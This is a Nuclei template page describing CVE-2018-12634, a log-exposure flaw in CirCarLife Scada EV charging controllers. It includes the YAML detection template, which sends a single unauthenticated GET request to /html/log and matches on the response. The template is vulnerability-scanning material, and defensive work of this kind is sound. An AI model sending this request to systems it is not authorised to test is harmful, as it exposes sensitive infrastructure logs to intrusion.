Skip to content
Nuclei Templates

CirCarLife Scada <4.3 - System Log Exposure

ID: CVE-2018-12634

Severity: critical

Author: geeknik

Tags: cve,cve2018,scada,circontrol,circarlife,logs,edb

Description

Section titled “Description”

CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station.

YAML Source

Section titled “YAML Source”
id: CVE-2018-12634


info:
  name: CirCarLife Scada <4.3 - System Log Exposure
  author: geeknik
  severity: critical
  description: CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station.
  impact: |
    An attacker can gain access to sensitive system logs, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade CirCarLife Scada to version 4.3 or above to fix the system log exposure vulnerability.
  reference:
    - https://circontrol.com/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12634
    - https://www.seebug.org/vuldb/ssvid-97353
    - https://www.exploit-db.com/exploits/45384/
    - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-12634
    cwe-id: CWE-200
    epss-score: 0.94448
    epss-percentile: 0.99209
    cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: circontrol
    product: circarlife_scada
  tags: cve,cve2018,scada,circontrol,circarlife,logs,edb


http:
  - method: GET
    path:
      - "{{BaseURL}}/html/log"


    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "CirCarLife Scada"


      - type: word
        words:
          - "user.debug"
          - "user.info"
          - "EVSE"
        condition: and


      - type: status
        status:
          - 200
# digest: 490a00463044022012a677c26e4df68cf7ec8568016708df31d6ebb8b4c195c831fcf718f533287902201d98740b67dba628b93853b13da3aa36e5034b1a694531295de8a0f54f7fff54:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-12634.yaml"

View on Github